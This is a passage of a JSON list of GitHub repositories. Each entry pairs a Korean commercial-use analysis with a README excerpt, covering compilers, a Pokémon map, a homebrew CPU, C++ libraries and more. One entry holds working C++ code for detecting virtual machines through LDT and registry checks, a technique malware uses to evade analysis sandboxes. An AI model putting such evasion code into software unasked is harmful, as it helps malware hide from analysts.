test\n```\n\n# Current status\n- [x] Four arithmetic operations\n- [x] Logical operation  \n- [x] Local variable\n- [x] Global variable\n- [x] Function call \n- [x] Function definition\n- [x] Array\n- [x] Pointer\n- [x] ++/--\n- [x] char/int type\n- [x] String literal\n- [x] Strunct\n- [x] extern\n- [x] Comment\n- [x] #include\n- [x] #define\n- [x] \\_\\_LINE\\_\\_\n\n# Design\nIf you want more information, I think you should refer to [README.md](https://github.com/rui314/9cc/blob/master/README.md) of [9cc](https://github.com/rui314/9cc).\n\n# Reference\nSpecial thanks to [9cc](https://github.com/rui314/9cc) and author [rui314](https://github.com/rui314)\n","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"wanttobeno/AntiVirtualMachine","github_url":"https://github.com/wanttobeno/AntiVirtualMachine","stars":15,"language":"C++","license":"unknown","abandonment_months":90,"description":"# AntiVirtualMachine 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 가상환경에서 실행되는지 감지하는 기술로, 보안이 필요한 소프트웨어가 불법 복제나 분석을 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임사나 구독형 소프트웨어가 정품 사용자만 접근하도록 검증하는 보안 기능\n2. **내부 업무 도구**: 기업이 직원","readme_excerpt":"\n\n#### 截图\n\n![snatshot.png](./snatshot.png)\n\n#### 虚拟机检测原理（部分）\n\n资料来自互联网，参考资料： [Tencent2016C (虚拟机检测技术)](https://www.52pojie.cn/thread-701845-1-1.html)\n\n\n\n##### 1、执行特权指令检测\n\n在x86体系中，一些指令在获取硬件相关信息时不产生异常，如sidt、sgdt、sldt、cpuid等，而VMware因为性能原因并没有虚拟这些指令，所以意味着这些指令在vm虚拟机中和物理机中运行时会返回不同的结果。\n\n可能会因为虚拟机的升级，导致结果不一样。\n\n##### 2、LDT（局部描述符表）\n\nsgdt与sldt指令探测技术，依赖于LDT（局部描述符表）由处理器分配而非操作系统分配的事实。因为Windows正常情况下不使用LDT，但VM提供了LDT的虚拟化支持，结果就是：真机中LDT位置为0，而在虚拟机，不为0。同时对于GTR，虚拟机中应为0xFFXXXXXX , 否则为真机。\n\n```c++\ninline bool IsVirtualPC_LDTCheck()\n{\n\tunsigned short ldt_addr = 0;\n\tunsigned char ldtr[2];\n\n\t_asm sldt ldtr\n\tldt_addr = *((unsigned short *)&ldtr);\n\treturn ldt_addr != 0x00000000;\n}\n```\n\n##### 3、注册表检测\n\n```c++\ninline bool DetectVM()\n{\n\tHKEY hKey;\n\n\tchar szBuffer[64];\n\n\tunsigned long hSize = sizeof(szBuffer)-1;\n\n\tif (RegOpenKeyEx(HKEY_LOCAL_MACHINE, \"HARDWARE\\\\DESCRIPTION\\\\System\\\\BIOS\\\\\", 0, KEY_READ, &hKey) == ERROR_SUCCESS)\n\t{\n\n\t\tRegQueryValueEx(hKey, \"SystemManufacturer\", NULL, NULL, (unsigned char *)szBuffer, &hSize);","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"lowlighter/gracidea","github_url":"https://github.com/lowlighter/gracidea","stars":24,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":52,"description":"# Gracidea 저장소 분석\n\n## 왜 보물인가\npokémon(포켓몬) 관련 데이터를 체계적으로 정리한 오픈소스 프로젝트로, 게임·앱·웹사이트 개발자들이 포켓몬 정보를 쉽게 활용할 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **포켓몬 도감 앱**: 유저들이 포켓몬 능력치, 진화 정보를 검색하는 모바일 애플리케이션\n- **게임 개발 도구*","readme_excerpt":"# ![](/copyrighted/icons/gracidea.png) Gracidea - *Pokémon* living web map\n\n![](/copyrighted/animated_map.gif)\n\n![Build](https://github.com/lowlighter/gracidea/workflows/Build/badge.svg)\n[![Live demo](https://img.shields.io/badge/%20-Gracidea%20live%20demo-black.svg?logo=adafruit)](https://gracidea.lecoq.io)\n\n**Gracidea** is a cartographic project which aims to map the whole known *Pokémon* world into a single 2D living web map.\n\n## ![](/copyrighted/icons/pokedoll.png) Features\n\n* **Faithful maps** based on games, anime, manga, artworks and custom map fillers\n* **Animated tiles and characters** for a more liveful world\n* **Wild areas** with accurate spawn rates (based on [PokeAPI data](https://github.com/PokeAPI/api-data)), including shiny encounters!\n* **Ergonomic interface** to quickly navigate around the map\n* *More features to come...*\n\n## ![](/copyrighted/icons/contribute.png) Contributing\n\nThe *Pokémon* world is really huge, and so is the amount of work needed to map it.\n\nWhether","composite_score":0.5014,"license_safety_tag":"risky"},{"name":"jes/scamp-cpu","github_url":"https://github.com/jes/scamp-cpu","stars":54,"language":"Slash","license":"Unlicense","abandonment_months":30,"description":"# jes/scamp-cpu 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 명령을 처리하는 가장 핵심적인 부분(CPU)을 직접 만들 수 있는 오픈소스 설계도로, 반도체 교육과 맞춤형 칩 개발에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **반도체 교육 플랫폼(SaaS)**: 대학과 부트캠프에 CPU 설계 강의용 시뮬레이터를 월 구독으로 제공\n2","readme_excerpt":"# SCAMP CPU\n\nSCAMP is my homebrew 16-bit CPU. It stands for something like \"Simple Computing and Arithmetic Microcoded Processor\".\n\nThe CPU is very primitive. It doesn't support interrupts, and has no MMU, and no concept of privilege levels. It currently runs\nat 1 MHz, above that the CompactFlash interface falls over. It runs a homebrew operating system, with a homebrew\nprogramming language and compiler, and can self-host the kernel and all of the system utilities.\nThe environment tastes a bit like an early Unix, but works like CP/M. I used the computer to complete\nalmost all of [Advent of Code 2021](https://adventofcode.com/2021/).\n\nMy Advent of Code solutions are here: https://github.com/jes/aoc2021\n\nI have some blog posts here: https://incoherency.co.uk/blog/tags/cpu.html and a web-based emulator available here: https://incoherency.co.uk/scamp/\n\nHere are some pictures:\n\n<img src=\"doc/computer.jpeg\" height=\"400\"> <img src=\"doc/card-cage.jpeg\" height=\"400\">\n\nAnd here's a video with so","composite_score":0.5014,"license_safety_tag":"unknown"},{"name":"csb6/html-plus-plus","github_url":"https://github.com/csb6/html-plus-plus","stars":8,"language":"C++","license":"AGPL-3.0","abandonment_months":72,"description":"# html-plus-plus 평가 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 기본 언어인 HTML을 더 쉽고 빠르게 작성할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹사이트 빌더 SaaS**\n- 코딩 없이 웹사이트를 만드는 서비스에 이 기술을 내장하여 생성 속도 향상\n\n**2. 웹 개발사 내부 업무 도구**\n- 개발자들의 작업 ","readme_excerpt":"# HTML++\n\nWrite HTML using C++ templates. The HTML document is represented as a single,\ndeeply-nested type which is type-checked by the compiler using certain rules about how\nHTML elements are allowed to be nested (e.g. nothing can be a child of a `<br>` tag).\n\nIf compilation succeeds, you will have a program that prints a properly-indented\nHTML document to the standard output when run.\n\n## Example\n\nSay you want to write the following HTML page:\n\n```html\n<html>\n  <head>\n    <title>Help Me.</title>\n  </head>\n  <body>\n    <h1>The horror!</h1>\n    <p>\n      Someone has probably done this before, but I can see why it didn't catch on.\n    </p>\n    <a href=\"https://github.com/csb6/html-plus-plus\">For science</a>\n  </body>\n</html>\n```\n\nHere is a C++ program that can be used to generate that page:\n\n```cpp\n#include <iostream>\n#include \"html++.h\"\n\nint main()\n{\n  html<\n    head<\n      title<\"Help Me.\">\n    >,\n    body<\n      h1<\"The horror!\">,\n      p<\"Someone has probably done this before, but I","composite_score":0.5014,"license_safety_tag":"risky"},{"name":"Sentdex/QuantumComputing","github_url":"https://github.com/Sentdex/QuantumComputing","stars":24,"language":"Jupyter Notebook","license":"MIT","abandonment_months":79,"description":"","readme_excerpt":"# Quantum Computer Programming tutorials and scripts\nCollection of Tutorials and other Quantum Computer programming related things. \n\nTutorial_1_Introduction.ipynb - Part 1 to the Youtube/PythonProgramming.net tutorials here: https://www.youtube.com/watch?v=aPCZcv-5qfA&list=PLQVvvaa0QuDc79w6NcGB0pnoJBgaKdfrW&index=2\n","composite_score":0.5014,"license_safety_tag":"safe"},{"name":"Cyber-Junk/OSCP-Preparation-Guide","github_url":"https://github.com/Cyber-Junk/OSCP-Preparation-Guide","stars":16,"language":"","license":"Unlicense","abandonment_months":50,"description":"# OSCP-Preparation-Guide 분석 보고서\n\n## 왜 보물인가\n컴퓨터 보안 자격증 취득을 목표로 하는 수천 명의 학습자들이 체계적인 공부 가이드를 찾고 있는데, 이 저장소는 그들의 학습 경로를 명확하게 제시해주는 검증된 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼 (SaaS)**\n보안 자격증 준비 과정을 구독형으","readme_excerpt":"# OSCP-Preparation-Guide\n> It is a compilation of some resources for preparing for OSCP.\n\n> Check [RESOURCE.md](https://github.com/Cyber-Junk/OSCP-Preparation-Guide/blob/main/README.md) for the Treasure you have been looking for.\n\nOffensive Security Certified Professional is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included with the Kali Linux distribution.\n\n## >> CHECK OUR [WEBSITE](https://cyberjunk.co) TO KNOW MORE ABOUT UPCOMING PROGRAMS!\n\n DONATE FOR A GOOD CAUSE: https://bank.hackclub.com/donations/start/cyber-junk\n \n## Feel free to Conrtibute :)\n\n\n\n\n<h3 align=\"left\">Join The Community:</h3>\n<p align=\"left\">\n<a href=\"https://twitter.com/cyberjunk_\" target=\"blank\"><img align=\"center\" src=\"https://raw.githubusercontent.com/rahuldkjain/github-profile-readme-generator/master/src/images/icons/Social/twitter.svg\" alt=\"cyberjunk_\" height=\"30\" width=\"40\" /></a>\n<a href=\"https://linkedin.com/in/c","composite_score":0.5013,"license_safety_tag":"unknown"},{"name":"Neulana/douban-movie-extension","github_url":"https://github.com/Neulana/douban-movie-extension","stars":14,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# Douban Movie Extension 상용화 분석\n\n## 왜 보물인가\n영화 정보 플랫폼(豆瓣)의 데이터를 웹에서 바로 확인할 수 있게 해주는 편의 도구로, 영화 추천 서비스나 콘텐츠 큐레이션 사업의 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **영화 추천 SaaS**: 사용자가 웹서핑 중 영화 제목을 클릭하면 자동으로 豆瓣 평점","readme_excerpt":"<p align=\"center\"><img src=\"./imgs/douban.jpg\" alt=\"\"></p>\n\n# 豆瓣电影传送门\n\n我是一名豆瓣爱好者，常常在豆瓣APP上面标记想看的电影，然后在有空的时候再去找资源看。豆瓣最近新增了”在哪儿看这部电影“版块，但是仅仅收录了比较常见的几家视频网站，比如优酷、腾讯视频等，这些网站往往需要购买VIP才能观看，为了节约花在找资源上的时间，我写了这个”豆瓣电影传送门“Chrome插件，妈妈再也不会担心我找不到电影资源了~🍻🍻🍻\n\n# 使用效果\n\n如图，在豆瓣电影页面的右边栏增加”豆瓣电影传送门“模块：\n\n![demo](./imgs/demo.jpg)\n\n# TODO列表\n- 近日（2019年03月22日）发现本插件依赖的网站[neets](https://neets.cc/)在搜索结果里不再展示小网站（可能因为版权原因），严重影响了该插件的想要达到的效果。所以需要自己写搜索API来支持该插件。\n\n# 如何使用\n\n提供两种下载方式。\n\n方式一，Chrome官方商店：\n\n需要翻墙，直接前往 [Chrome商店](https://chrome.google.com/webstore/detail/豆瓣电影传送门/pkidecliagangmpphpelecaoogfbnihi ) 下载；\n\n方式二，手动安装：\n\n1. 点击[download文件夹](https://github.com/Neulana/douban-movie-extension/tree/master/download)下载最新版本到本地；\n2. 打开Chrome，在地址栏输入chrome://extensions/，回车；\n3. 打开右上角的”开发者模式“开关；\n4. 将已下载的crx文件拖入Chrome扩展程序窗口；\n5. 打开任意电影的[豆瓣主页](https://movie.douban.com/subject/26647117/)，右边就会出现”豆瓣电影传送门“版块\n6. 你就可以愉快的看电影了🎉🎉🎉\n\n**说明**：有版本更新时，可在浏览器地址栏右侧找到本插件的图标，鼠标右键选择”从Chrome中移除...“，然后，再重复以上6个步骤即可，请关注本repo~\n\n# 感谢\n\n- 灵感来自 [Ovilia](https://github.com","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"Bahn-X/swift-composable-navigator","github_url":"https://github.com/Bahn-X/swift-composable-navigator","stars":12,"language":"Swift","license":"MIT","abandonment_months":52,"description":"# swift-composable-navigator 평가 보고서\n\n## 왜 보물인가\n아이폰 앱에서 화면 전환을 쉽고 깔끔하게 처리해주는 도구로, 개발자의 업무 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **아이폰 앱 개발 SaaS**: 이 기술을 포함한 아이폰 앱 개발 플랫폼을 월 구독 형태로 판매\n2. **개발사 기술 지원 서비스*","readme_excerpt":"# Unmaintained \nSee [#80](https://github.com/Bahn-X/swift-composable-navigator/pull/80)\n\n<p align=\"center\">\n  <img src=\"./Documentation/logo.png\" width=\"15%\" align-content: center/>\n</p>\n<h3 align=\"center\">Composable Navigator</h2>\n<h3 align=\"center\">\n  An open source library for building deep-linkable SwiftUI applications with composition, testing and ergonomics in mind\n</h3>\n<p align=\"center\"><a title=\"GitHub Actions\" target=\"_blank\" href=\"https://github.com/Bahn-X/swift-composable-navigator/workflows/test/badge.svg\">\n\t\t<img src=\"https://github.com/Bahn-X/swift-composable-navigator/workflows/test/badge.svg\"\n\t\t\t\t\talt=\"test status\"></p>\n<hr class=\"rounded\">\n\n- [Vanilla SwiftUI navigation](#vanilla-swiftui-navigation)\n- [Challenges](#challenges)\n- [Why should I use ComposableNavigator?](#why-should-i-use-composablenavigator)\n- [Core components](#core-components)\n  - [Navigation Path](#navigation-path)\n  - [Navigator](#navigator)\n  - [NavigationTree](#navigationtree)\n- [Vanilla SwiftUI +","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"darconeous/gauss-key-card","github_url":"https://github.com/darconeous/gauss-key-card","stars":11,"language":"Java","license":"Apache-2.0","abandonment_months":75,"description":"# Gauss Key Card 분석 보고서\n\n## 왜 보물인가\n암호화된 카드 키 시스템을 간단하게 만들고 관리할 수 있어서, 보안이 필요한 여러 기업과 서비스에서 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기숙사·오피스·호텔 등에서 카드키 발급·관리 시스템으로 제공\n- **내부 업무 도구**: 대기업의 출입통제 및 직","readme_excerpt":"Gauss Key Card\n==============\n\n*Gauss Key Card* is a [Java Card][] applet that implements the minimal\nworking subset of the [Tesla Key Card Protocol][]. Supported Java Card\nimplementations that load this application will be able to be paired\nwith a compatible vehicle and subsequently unlock, start, or lock the\nvehicle in the same way you would with an official key card. ([video][])\n\nIf at this point you can't imagine why you might ever want to use this\napplet, then it is not for you.\n\n[Java Card]: https://en.wikipedia.org/wiki/Java_Card\n[Tesla Key Card Protocol]: https://gist.github.com/darconeous/2cd2de11148e3a75685940158bddf933\n[video]: https://www.youtube.com/watch?v=QBP_Hjlpwjs\n\n## Caveats ##\n\nTHIS APPLET IS INTENDED FOR EXPERIMENTAL USE ONLY. IT HAS NOT BEEN\nREVIEWED, CHECKED, APPROVED, OR ENDORSED BY TESLA. IT MAY BE BLOCKED\nBY TESLA AT ANY TIME.\n\nBY USING THIS APPLET (OR INSTALLING IT TO A CARD FOR SOMEONE ELSE\nTO USE) YOU ASSUME ALL RESPONSIBILITY, RISK, AND LIABILITY FOR THE\nU","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"microsoft/infersharp","github_url":"https://github.com/microsoft/infersharp","stars":7,"language":"C#","license":"MIT","abandonment_months":29,"description":"# InferSharp 분석 리포트\n\n## 왜 보물인가\n마이크로소프트가 만든 이 도구는 C# 코드의 숨겨진 버그를 자동으로 찾아내는 검사 도구로, 소프트웨어 품질을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발사들이 구독해서 자신의 코드를 정기적으로 검사받는 클라우드 기반 코드 분석 플랫폼\n2. **내부 업무 도","readme_excerpt":"# ![InferSharp icon](/assets/Market_InferSharp_72.png) InferSharp\n\n**InferSharp** (also referred to as Infer#) is an interprocedural and scalable static code analyzer for C#. Via the capabilities of Facebook's [Infer](https://fbinfer.com/), this tool detects race conditions, null pointer dereferences and resource leaks. It also performs [taint flow tracking](https://en.wikipedia.org/wiki/Taint_checking) to detect critical security vulnerabilities like SQL injections. Read more about our approach in the [Wiki page](https://github.com/microsoft/infersharp/wiki/InferSharp:-A-Scalable-Code-Analytics-Tool-for-.NET).\n\nIn addition to implementing the C# frontend, we contributed our [language-agnostic serialization layer](https://github.com/microsoft/infersharp/wiki/InferSharp:-A-Scalable-Code-Analytics-Tool-for-.NET#language-agnostic-representation-of-sil) ([Commit #1361](https://github.com/facebook/infer/commit/285ddb4a98f337a40d61e73b7a0867e44fa4f042)) to facebook/infer, which opens up oppo","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"iranee/qnap-aliyunpan-webdav","github_url":"https://github.com/iranee/qnap-aliyunpan-webdav","stars":7,"language":"PHP","license":"MIT","abandonment_months":44,"description":"# iranee/qnap-aliyunpan-webdav 분석\n\n## 왜 보물인가\nQNAP 나스(개인용 저장장치)에서 알리바바 클라우드 드라이브를 마치 일반 폴더처럼 사용할 수 있게 해주는 연결 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: QNAP 사용자를 위한 클라우드 통합 서비스로 월 구독 제공\n2. **내부 업무 도구**: 기업","readme_excerpt":"# Aliyunpan Webdav for QNAP\n![Release](https://img.shields.io/github/v/release/iranee/qnap-aliyunpan-webdav?color=2&label=Releases)\n\n## 已启用新插件 [qnap-alist-webdav](https://github.com/iranee/qnap-alist-webdav)，本插件暂时停更。\n\n## 介绍\n通过 Rust 语言实现了阿里云盘的webdav协议，只需要简单的配置一下，就可以让阿里云盘变身为webdav协议的文件服务器。\n\n* Rust 版开源：https://github.com/messense/aliyundrive-webdav\n* Go 版开源：`https://github.com/LinkLeong/go-aliyundrive-webdav`\n\n## 升级提示\n- 适配Rust最新编译版本v1.10.1\n- 为了兼容性，提取json字符串用awk命令\n- 当输入正确的token后，系统会自动刷新并更新token，即使再次输入错误的token也可以正常运行，直至系统获取的token失效\n- 暂时未发现Rust版被QNAP误识别为恶意软件\n- 新增阿里云盘分身版S_开头，可同时登录2个账户\n\n> ARM版因为权限问题，安装过后要手动给安装目录0777权限，可以用winscp设置，也可以用PuTTy来执行代码：<br>\n>```chmod -Rf 777 $(/sbin/getcfg aliyunpan Install_Path -f /etc/config/qpkg.conf)/*.*```\n\n\n## Rust语言版本\n- [x] 更换内核版本为Rust 语言，版本从V1.0.0开始\n- [x] 此版本可以挂载威联通文件总管 \n- [x] Webdav服务更多配置选项\n- [x] 增加 Token 失效时，QNAP 管理界面通知\n- [x] [增加 Bark App 推送（iOS , Android, Windows 跨平台）](https://github.com/Finb/Bark)\n- [ ] 介绍配置推送通知（iOS端Bark App）\n\n## 如何使用\n在QNAP系统，通过App Center手","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"openwisp/django-ipam","github_url":"https://github.com/openwisp/django-ipam","stars":10,"language":"Python","license":"BSD-3-Clause","abandonment_months":73,"description":"# django-ipam 상용화 분석\n\n## 왜 보물인가\n기업의 수천 개 네트워크 기기를 자동으로 관리하고 충돌 없이 주소를 할당해주는 시스템으로, 네트워크 관리자의 수작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 인프라 관리 SaaS**: AWS/Azure 같은 클라우드 서비스 제공 업체가 고객사의 네트워크 주소 할당을 자","readme_excerpt":"**WARNING**: The development of this project has moved to `openwisp-ipam <https://github.com/openwisp/openwisp-ipam>`_, we advise all users of django-ipam to migrate.\n\n**The development of django-ipam is discontinued and this repository is archived.**\n","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"CaoWGG/Mask-CenterNet","github_url":"https://github.com/CaoWGG/Mask-CenterNet","stars":12,"language":"Python","license":"MIT","abandonment_months":71,"description":"# Mask-CenterNet 상용화 분석\n\n## 왜 보물인가\n사진 속 사람의 얼굴과 신체 위치를 자동으로 인식하는 기술로, 보안 카메라, 의료 영상 분석, 스포츠 중계 등 다양한 산업에서 필수적으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 온라인 안전 모니터링 플랫폼**\n- 편의점, 주차장, 소매점의 CCTV 영상을 실","readme_excerpt":"# CenterNet-CondInst\n[CenterNet: Objects as Points](https://arxiv.org/abs/1904.07850) + [CondInst: Conditional Convolutions for Instance Segmentation](https://arxiv.org/abs/2003.05664) \n\n## Installation\nPlease refer to [CnterNet INSTALL.md](readme/INSTALL.md) for installation instructions.\n\n## Training\n```bash\n## note : seg_weight default setting is 1. You can set it to other value to get better performance.\ncd src\npython main.py ctseg --exp_id coco_dla_1x --batch_size 20 --master_batch 9 --lr 1.25e-4 --gpus 0,1 --num_workers 4\n```\n## Eval\n```bash\n## not support flip test and multi scale test\ncd src\npython test.py ctseg --exp_id coco_dla_1x --keep_res --resume\n```\n## Visualization\n```bash\ncd src\npython demo.py ctseg --exp_id coco_dla_1x --keep_res --resume --demo ../data/coco/val2017\n```\n\n## Result\n| type| AP |  AP<sub>50</sub> | AP<sub>75</sub> | AP<sub>s</sub> | AP<sub>m</sub> | AP<sub>l</sub> | \n|-----|------|-----|-----|-----|-----|-----|\n|box|0.358|0.540|0.384|0.154|0.391|0.535|\n|","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"Text-Mining/Persian-NER","github_url":"https://github.com/Text-Mining/Persian-NER","stars":13,"language":"","license":"MIT","abandonment_months":60,"description":"# Persian-NER 저장소 분석\n\n## 왜 보물인가\n페르시아어로 된 텍스트에서 사람, 장소, 조직 등의 정보를 자동으로 찾아내는 기술로, 페르시아어 처리 분야의 희귀한 오픈소스 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **페르시아어 뉴스 분석 SaaS**: 뉴스 기사에서 주요 인물과 기관을 자동 추출하는 구독형 웹 서비스\n2. **내부 업무 도구","readme_excerpt":"\n\n\n<div dir=\"rtl\">\n\n# Persian-NER\nیکی از ابزارهای مهم جهت استخراج اطلاعات از متن، شناسایی موجودیت‌های نامدار (Named Entity Recognition) است. تشخیص موجودیت‌های نامدار (نامی) به این معناست که اسامی خاص در یک متن را بتوان تشخیص داد و آنها را به رده‌های مشخصی دسته‌بندی کرد.\n\nاین مخزن حاوی پیکره‌ای از اطلاعات برچسب‌خورده استاندارد است. اطلاعات از *ویکی‌پدیای فارسی* استخراج شده‌اند و در حال حاضر شامل حدود **بیست و پنج میلیون توکن** در قالب حدود **یک میلیون جمله** است\n\n## به بهبود برچسب‌های این پیکره کمک کنید\nاین پیکره به صورت اپن‌سورس منتشر شده است. همه پژوهشگران و علاقمندان می‌توانند به رایگان از آن استفاده کنند. برای بهبود برچسب‌های این پیکره می‌توانید به سایت زیر مراجعه کنید:\n[https://app.text-mining.ir](https://app.text-mining.ir)\n\n تا کنون بیش از ۱۰۰۰ نفر از کاربران در بهبود این پیکره نقش داشته‌اند. لیست کامل مشارکت‌کنندگان (تا زمان انتشار فایل) را از [اینجا](https://github.com/Text-Mining/Persian-NER/blob/master/contributors.txt) می‌توانید مشاهده کنید\n\nبعد از ثبت‌نام و ورود، با مراجعه ","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"fossasia/open-event-theme","github_url":"https://github.com/fossasia/open-event-theme","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":42,"description":"# fossasia/open-event-theme 상용화 분석\n\n## 왜 보물인가\n행사 운영자들이 자신의 브랜드에 맞게 이벤트 웹사이트를 쉽게 만들고 꾸밀 수 있는 디자인 틀이다.\n\n## 어디에 쓸 수 있나\n\n**1. 이벤트 플랫폼 SaaS**\n컨퍼런스, 전시회, 웨비나 주최자들이 별도 개발 없이 자신의 행사 홈페이지를 몇 분 안에 만들 수 있는 온라인 서","readme_excerpt":"\n# Open Event Theme\n\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg?style=flat-square)](https://gitter.im/fossasia/open-event-frontend)\n[![NPM](https://img.shields.io/npm/v/@open-event/theme.svg?style=flat-square)](https://www.npmjs.com/package/@open-event/theme)\n\n> The Open Event Standard Theme\n\n\nThe Open Event Theme is the standard theme component of the Open Event project. Open Event enables organizers to manage events from concerts to conferences and meet-ups. It offers features for events with several tracks and venues. Event managers can create invitation forms for speakers and build schedules in a drag and drop interface. The event information is stored in a database. The system provides API endpoints to fetch the data, and to modify and update it. Organizers can import and export event data in a standard compressed file format that includes the event data in JSON and binary media files like images and audio.\n\n### Usage\n\nThe theme package can be installed vi","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"TIGERB/naruto","github_url":"https://github.com/TIGERB/naruto","stars":18,"language":"PHP","license":"MIT","abandonment_months":25,"description":"# TIGERB/naruto 분석 보고서\n\n## 왜 보물인가\n복잡한 업무 흐름을 자동으로 관리하는 시스템으로, 기업이 반복적인 작업을 효율적으로 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 중소 기업들이 구독 기반으로 사용할 수 있는 자동화 워크플로우 플랫폼\n**내부 업무 도구**: 대기업의 HR, 재무팀이 결재·승인 프로","readme_excerpt":"```\n                       _        \n                      | |       \n_ __   __ _ _ __ _   _| |_ ___  \n| '_ \\ / _` | '__| | | | __/ _ \\ \n| | | | (_| | |  | |_| | || (_) |\n|_| |_|\\__,_|_|   \\__,_|\\__\\___/ .TIGERB.cn\n\t\t\t\nAn object-oriented multi process manager for PHP\n\nVersion: 0.5.0\n\n```\n\n<p align=\"center\">\n<a href=\"http://naruto.tigerb.cn/\"><img src=\"https://img.shields.io/badge/os-Linux%26Darwin-blue.svg\" alt=\"OS\"></a>\n</p>\n\n\n<p align=\"center\">\n\t<a href=\"http://naruto.tigerb.cn/\"><img width=\"30%\" src=\"http://blog-1251019962.cos.ap-beijing.myqcloud.com/qiniu_img_2022/wechat-blog-qrcode.jpg?imageMogr2/thumbnail/260x260!/format/webp/blur/1x0/quality/90|imageslim\"></a>\n</p>\n\n\n# How to use?\n\n### Install\n\n```\ncomposer create-project tigerb/naruto naruto --prefer-dist && cd naruto\n```\n\n### Business code\n\n```php\n\nnew Manager([], function (Process $worker) {\n\t\t\t// mock business logic\n\t\t\t(new Test())->businessLogic();\n\t\t}\n\t);\n```\n\n### Run\n\n> echo export NARUTO_PATH=$(pwd) >> ~/.profile && echo","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"eleftherias/springone-2021","github_url":"https://github.com/eleftherias/springone-2021","stars":24,"language":"Java","license":"unknown","abandonment_months":58,"description":"# SpringOne 2021 저장소 분석\n\n## 왜 보물인가\nSpring Framework(기업용 소프트웨어 개발의 핵심 도구)의 최신 기술과 활용법을 배울 수 있는 공식 컨퍼런스 자료모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 엔터프라이즈 고객을 위한 클라우드 기반 업무 관리 플랫폼 개발\n- **내부 업무 도구**: 대기업의 레거","readme_excerpt":"# Test-Driven Security\n\n## Run tests\n`./gradlew test`\n\n## References\n\nSpring Security test support  \nhttps://docs.spring.io/spring-security/site/docs/current/reference/html5/#test\n\nOWASP Security Testing guide  \nhttps://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/\n","composite_score":0.5013,"license_safety_tag":"unknown"},{"name":"tqdm/tqdm.cpp","github_url":"https://github.com/tqdm/tqdm.cpp","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":30,"description":"# tqdm/tqdm.cpp 분석 리포트\n\n## 왜 보물인가\n프로그램 실행 진행률을 보기 좋게 표시해주는 도구로, 많은 소프트웨어 회사들이 사용자 경험을 개선하는 데 필수적으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 데이터 처리 플랫폼에서 대량 파일 업로드/변환 시 진행 상황을 사용자에게 실시간으로 표","readme_excerpt":"![][Logo]\n\ntqdm\n====\n\n**Official** C++ port of the popular python module, [tqdm](https://github.com/tqdm/tqdm). Work in progress (pre-alpha)\n\n[![][Build-Status]][Build-Status-lnk] [![][Coverage-Status]][Coverage-Status-lnk]\n\n<!--\n[Build-Status] [Coverage-Status] [Branch-Coverage-Status]\n\n[DOI-URI]\n-->\n\n[![][Licence]][Licence-lnk]\n\n`tqdm` (read taqadum, تقدّم) means \"progress\" in arabic.\n\nInstantly make your loops show a smart progress meter - just wrap any\niterable with `tqdm(iterable)`, and you're done!\n\n``` cpp\n#include \"tqdm/tqdm.h\"\n\nfor (int i : tqdm::range(5))  // for(int i = 0; i < 5; ++i)\n  ...\n\n// even more pythonic\n// for(float i = 2.3f; i < 9.1f; i += 0.1f)\nfor (auto i : tqdm::range(2.3f, 9.1f, 0.1f))\n  ...\n\n// container and iterator wrappers\nstd::vector<unsigned int> a = {0, 1, 2, 3, 4, 5};\nfor (auto &i : tqdm::tqdm(a))\n  for (auto &j : tqdm::tqdm(a.begin(), a.end()))\n    i += j;\n```\n\nHere's what the output will look like:\n\n``76%|████████████████████████████         | 7568/1","composite_score":0.5013,"license_safety_tag":"unknown"},{"name":"orijtech/structslop","github_url":"https://github.com/orijtech/structslop","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":28,"description":"# structslop 저장소 분석\n\n## 왜 보물인가\n프로그램 코드에서 불필요한 메모리 낭비를 자동으로 찾아주는 검사 도구로, 소프트웨어의 효율성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 소프트웨어를 진단받을 수 있는 온라인 검사 서비스로 제공\n2. **내부 업무 도구**: 대형 IT 회사들이 자체 개","readme_excerpt":"# structslop\n\n![Build status](https://github.com/orijtech/structslop/workflows/Go/badge.svg?branch=master)\n\nPackage structslop defines an 